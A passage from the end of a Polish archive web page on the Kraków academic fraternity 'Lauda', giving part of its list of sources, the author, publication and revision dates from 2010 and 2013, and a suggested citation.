3) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Lauda (Kraków), (w:) Polskie Korporacje Akademickie 1997, nr 13, s. 49 i n.,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Lauda.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2010 r.
Ostania zmiana: 10 III 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Jagiellońskiego “Lauda” (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 10 III 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }